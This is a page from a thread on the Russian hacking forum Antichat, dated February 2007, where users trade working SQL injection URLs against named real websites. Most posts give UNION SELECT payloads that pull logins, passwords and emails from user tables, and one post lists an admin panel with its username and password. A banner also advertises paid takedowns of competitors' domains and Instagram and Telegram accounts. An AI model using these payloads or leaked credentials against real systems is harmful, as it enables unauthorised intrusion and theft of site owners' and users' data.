Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 57 из 1242

Опции темы

Поиск в этой теме

Опции просмотра

#561

22.02.2007, 19:07

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

Цитата:

Сообщение от swat

сорь не знал....

это я к тому, что админам пох))

#562

22.02.2007, 22:25

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

Провел на форуме:
6860213

Репутация: 378

GlobalMoney.ru

Код:

http://www.globalmoney.ru/affiliate/order.php?tovar_id=-1+union+select+1,2,login,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+users+limit+0,1

#563

22.02.2007, 23:00

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

Цитата:

http://www.mirmaek.ru/index.php?rubric_id=28&page=-1

К сожелению думаю из этого не чего не получится, но всё же, как я понял параметр ПЕЙДЖ берётся для вычисления лимита вывода /простым сумированием/, а параметр рубрики не смог провести.
Кто сделает если не сложно выложите, я хочу глянуть как это можно провернуть....

#564

22.02.2007, 23:38

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Цитата:

http://www.ezgulik.org/news.php?id=-197%20union%20select%201,2,user(),database(),5,6/*

Цитата:

http://www.trud.ru/issue/news.php?id=-2222%20union%20select%201,2,user(),database(),5,6, 7/*

Цитата:

http://www.survival-international.org/news.php?id=-2128%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17/*

Цитата:

http://www.a2k.org.ua/news.php?id=-31%20union%20select%201,2,3,email,password,id,user ,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20 users/*&lng=en

#565

23.02.2007, 00:03

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Цитата:

Сообщение от kamaz

http://forum.antichat.ru/threadnav21336-58-10.html
Написал *D1VER 19.02.2007, 21:57 /одна большая дырка/

Цитата:

http://www.a2k.org.ua/index.php?topic=9&section=-1+union+select+concat(user,password)+from+users/*&lng=ru

http://www.a2k.org.ua/admin/

admin:repz

#566

23.02.2007, 00:18

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Упс

Цитата:

http://english.dvb.no/news.php?id=-4399%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22/*

Цитата:

http://www.mounteverest.net/news.php?id=-15244%20union%20select%201,2,3,4,5,6,7/*

Цитата:

http://www.allaboutjazz.com/php/news.php?id=8639999991%20union%20select%201,2,3,4, 5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27/*

В последнем есть форум. Таблицы не подобрал

#567

23.02.2007, 02:55

Patrik

Познающий

Регистрация: 15.01.2006

Сообщений: 45

Провел на форуме:
210499

Репутация: 16

Отправить сообщение для Patrik с помощью ICQ

http://lizvicious.com/tour1/index.php?section=113&start=1"&t=movies
Напишите, пожалуйста, в личку, если кто разберёться. А то не получаеться ничего.

#568

23.02.2007, 03:13

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

http://lizvicious.com/tour1/index.php?section=113&t=movies&start=2+union+selec t+1/*

Цитата:

DB Error: Wrong usage of UNION and ORDER BY

#569

23.02.2007, 18:27

RaDDeaD

Познающий

Регистрация: 28.12.2006

Сообщений: 44

Провел на форуме:
119257

Репутация: 56

Цитата:

Сообщение от RaDDeaD

Что ещё можно сделать на етом сайте ? Что мог попробовал, ничё не откопал кроме user() database()...

http://igrafit.ru/company/news/?article=-1+union+select+1,2,3,4,5,7,8,9,10,11,12,13/*

#570

23.02.2007, 19:16

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

RaDDeaD
щас модно по 2 раза постить одно и тоже?
посвящаеться фанатам гостей из будущего
http://gosti.ru/gforum/f_othinfo.php?thuid=-594+union+select+1,2,3,4,5,6,concat(login,CHAR(59) ,pass,CHAR(59),email),8,9,10,11+from+gusers/*пассы в чистом виде

Последний раз редактировалось }{0TT@БЬ)Ч; 23.02.2007 в 19:25..

Страница 57 из 1242

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход